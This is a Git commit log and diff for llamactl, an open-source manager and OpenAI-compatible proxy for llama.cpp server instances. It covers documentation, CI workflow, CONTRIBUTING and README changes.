134 Commits

Author SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
ae1bf8561f Merge pull request #8 from lordmathis/feat/frontend-api-auth
feat: Add management API key authentication with login dialog
2025-07-31 20:36:32 +02:00
ad117ef6c6 Add AuthProvider to test components 2025-07-31 20:34:33 +02:00
169432260a Refactor health service to use centralized api client 2025-07-31 19:11:55 +02:00
f94a150b07 Refactor modals to dialogs and update related tests for consistency 2025-07-31 19:03:43 +02:00
c038cabaf6 Implement authentication flow with API key support and loading states 2025-07-31 18:59:12 +02:00
89f90697ef Merge pull request #7 from lordmathis/feat/api-key-auth
Feature: Add API key auth for OpenAI compatible endpoints and llamactl management API endpoints on backend
2025-07-30 21:36:40 +02:00
8e8056f071 Update swagger docs 2025-07-30 21:34:46 +02:00
4d06bc487a Update README for api key auth 2025-07-30 21:31:20 +02:00
bedec089ef Implement middleware tests 2025-07-30 21:20:50 +02:00
b3540d5b3e Implement api key auth 2025-07-30 20:15:14 +02:00
72ba008d1e Merge pull request #6 from lordmathis/fix/release-notes-gen
Remove changelog generation step from release workflow
2025-07-28 22:35:00 +02:00
0aa5def9ec Remove changelog generation step from release workflow 2025-07-28 22:32:44 +02:00
79364eca95 Merge pull request #5 from lordmathis/fix/llama-server-cors
Remove llama server cors headers
2025-07-28 22:10:05 +02:00
e1889a65ac Remove llama server cors headers 2025-07-28 22:06:44 +02:00
83 changed files with 7366 additions and 2813 deletions

65
.github/workflows/docs.yml vendored Normal file
View File

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
- '.github/workflows/docs.yml'
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: read
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0 # Needed for git-revision-date-localized plugin
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
- name: Upload documentation artifact
if: github.ref == 'refs/heads/main'
uses: actions/upload-pages-artifact@v3
with:
path: ./site
deploy:
if: github.ref == 'refs/heads/main'
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v4

View File

@@ -29,6 +29,8 @@ jobs:
npm ci npm ci
- name: Build Web UI - name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: | run: |
cd webui cd webui
npm run build npm run build
@@ -108,63 +110,9 @@ jobs:
*.zip *.zip
retention-days: 1 retention-days: 1
generate-changelog:
name: Generate Changelog
runs-on: ubuntu-latest
outputs:
changelog: ${{ steps.changelog.outputs.changelog }}
steps:
- name: Checkout repository
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Generate changelog
id: changelog
run: |
# Get the previous tag
PREVIOUS_TAG=$(git tag --sort=-version:refname | grep -v "^${{ github.ref_name }}$" | head -n1)
if [ -z "$PREVIOUS_TAG" ]; then
echo "No previous tag found, generating changelog from first commit"
PREVIOUS_TAG=$(git rev-list --max-parents=0 HEAD)
fi
echo "Generating changelog from $PREVIOUS_TAG to ${{ github.ref_name }}"
# Generate changelog
CHANGELOG=$(cat << 'EOL'
## What's Changed
EOL
)
# Get commits between tags
COMMITS=$(git log --pretty=format:"* %s (%h)" "$PREVIOUS_TAG..${{ github.ref_name }}" --no-merges)
if [ -z "$COMMITS" ]; then
CHANGELOG="${CHANGELOG}* No changes since previous release"
else
CHANGELOG="${CHANGELOG}${COMMITS}"
fi
# Add full changelog link if we have a previous tag and it's not a commit hash
if [[ "$PREVIOUS_TAG" =~ ^v[0-9] ]]; then
CHANGELOG="${CHANGELOG}
**Full Changelog**: https://github.com/${{ github.repository }}/compare/${PREVIOUS_TAG}...${{ github.ref_name }}"
fi
# Save changelog to output (handle multiline)
{
echo 'changelog<<EOF'
echo "$CHANGELOG"
echo EOF
} >> $GITHUB_OUTPUT
release: release:
name: Create Release name: Create Release
needs: [build, generate-changelog] needs: [build]
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- name: Download all artifacts - name: Download all artifacts
@@ -184,8 +132,9 @@ jobs:
uses: softprops/action-gh-release@v2 uses: softprops/action-gh-release@v2
with: with:
name: Release ${{ github.ref_name }} name: Release ${{ github.ref_name }}
body: ${{ needs.generate-changelog.outputs.changelog }} tag_name: ${{ github.ref_name }}
files: release-assets/* files: release-assets/*
generate_release_notes: true
draft: false draft: false
prerelease: ${{ contains(github.ref_name, '-') }} prerelease: ${{ contains(github.ref_name, '-') }}
env: env:

19
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}

1
CNAME Normal file
View File

@@ -0,0 +1 @@
llamactl.org

182
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

287
README.md
View File

@@ -2,225 +2,136 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
A control server for managing multiple Llama Server instances with a web-based dashboard. **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
## Features ## Why llamactl?
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances 🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **Web Dashboard**: Modern React-based UI for managing instances 🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
- **Auto-restart**: Configurable automatic restart on instance failure 🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **Instance Monitoring**: Real-time health checks and status monitoring 🔐 **API Key Authentication**: Separate keys for management vs inference access
- **Log Management**: View, search, and download instance logs 📊 **Instance Monitoring**: Health checks, auto-restart, log management
- **REST API**: Full API for programmatic control **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **OpenAI Compatible**: Route requests to instances by instance name 💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
- **Configuration Management**: Comprehensive llama-server parameter support 💾 **State Persistence**: Ensure instances remain intact across server restarts
- **System Information**: View llama-server version, devices, and help
## Prerequisites ![Dashboard Screenshot](docs/images/dashboard.png)
This project requires `llama-server` from llama.cpp to be installed and available in your PATH. **Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
**Install llama.cpp:** ## Quick Start
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
## Installation
### Build Requirements
- Go 1.24 or later
- Node.js 22 or later (for building the web UI)
### Building with Web UI
```bash ```bash
# Clone the repository # 1. Install llama-server (one-time setup)
git clone https://github.com/lordmathis/llamactl.git # See: https://github.com/ggml-org/llama.cpp#quick-start
cd llamactl
# Install Node.js dependencies # 2. Download and run llamactl
cd webui LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
npm ci curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Build the web UI # 3. Start the server
npm run build llamactl
# Access dashboard at http://localhost:8080
# Return to project root and build
cd ..
go build -o llamactl ./cmd/server
# Run the server
./llamactl
```
## Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
1. Hardcoded defaults
2. Configuration file
3. Environment variables
### Configuration Files
Configuration files are searched in the following locations:
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
### Configuration Options
#### Server Configuration
```yaml
server:
host: "" # Server host to bind to (default: "")
port: 8080 # Server port to bind to (default: 8080)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances
log_directory: "/tmp/llamactl" # Directory for instance logs
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
### Example Configuration
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8001, 8100]
log_directory: "/var/log/llamactl"
max_instances: 10
llama_executable: "/usr/local/bin/llama-server"
default_auto_restart: true
default_max_restarts: 5
default_restart_delay: 10
``` ```
## Usage ## Usage
### Starting the Server ### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance
### Or use the REST API:
```bash ```bash
# Start with default configuration # Create instance
./llamactl curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
# Start with custom config file # Use with OpenAI SDK
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
# Start with environment variables -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
``` ```
### Web Dashboard ## Installation
Open your browser and navigate to `http://localhost:8080` to access the web dashboard. ### Option 1: Download Binary (Recommended)
### API Usage
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
#### Create an Instance
```bash ```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \ # Linux/macOS - Get latest version and download
-H "Content-Type: application/json" \ LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
-d '{ curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
"model": "/path/to/model.gguf", sudo mv llamactl /usr/local/bin/
"gpu_layers": 32,
"auto_restart": true # Or download manually from the releases page:
}' # https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
``` ```
#### List Instances ### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash ```bash
curl http://localhost:8080/api/v1/instances # Quick install methods:
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
``` ```
#### Start/Stop Instance ## Configuration
```bash llamactl works out of the box with sensible defaults.
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
# Stop ```yaml
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
``` ```
### OpenAI Compatible Endpoints For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
Route requests to instances by including the instance name as the model parameter:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-instance",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
## Development
### Running Tests
```bash
# Go tests
go test ./...
# Web UI tests
cd webui
npm test
```
### Development Server
```bash
# Start Go server in development mode
go run ./cmd/server
# Start web UI development server (in another terminal)
cd webui
npm run dev
```
## API Documentation
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
## License ## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details. MIT License - see [LICENSE](LICENSE) file.

View File

@@ -1,5 +1,5 @@
// Package docs Code generated by swaggo/swag. DO NOT EDIT // Package apidocs Code generated by swaggo/swag. DO NOT EDIT
package docs package apidocs
